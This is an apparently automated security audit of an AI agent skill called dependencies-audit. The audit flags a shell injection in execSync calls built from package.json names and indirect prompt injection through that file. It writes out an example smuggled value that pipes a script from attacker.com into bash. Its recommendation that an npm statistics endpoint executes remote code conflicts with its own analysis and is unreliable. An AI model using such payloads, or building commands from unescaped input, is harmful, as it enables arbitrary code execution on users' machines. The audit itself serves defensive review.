dependencies-audit
Fail
Audited by Gen Agent Trust Hub on Apr 23, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION]: The skill contains a critical shell injection vulnerability in SKILL.md within the Node.js scripts in Step 2 and Step 5. The logic iterates through dependency names from a project's package.json and executes them via execSync('npm view ' + name + ...). Because the 'name' variable is taken directly from the untrusted JSON file without escaping or validation, a malicious file containing a package name with shell metacharacters (e.g., 'package; curl http://attacker.com/shell | bash') would result in arbitrary command execution.- [PROMPT_INJECTION]: The skill is susceptible to Indirect Prompt Injection (Category 8). It ingests untrusted data from the package.json file which is then used to construct shell commands and influence the agent's decision-making process. Ingestion points: package.json file contents read via Node.js scripts. Boundary markers: None are present to isolate the untrusted package names from the shell execution context. Capability inventory: The skill uses Shell, Write, and Read tools, enabling system-level changes. Sanitization: No sanitization or escaping is performed on the input before it is used in command strings.- [EXTERNAL_DOWNLOADS]: The skill fetches package metadata and weekly download statistics from the well-known service api.npmjs.org. This is documented as a standard operational behavior for auditing dependencies.
Recommendations
- HIGH: Downloads and executes remote code from: https://api.npmjs.org/downloads/point/last-week/ - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata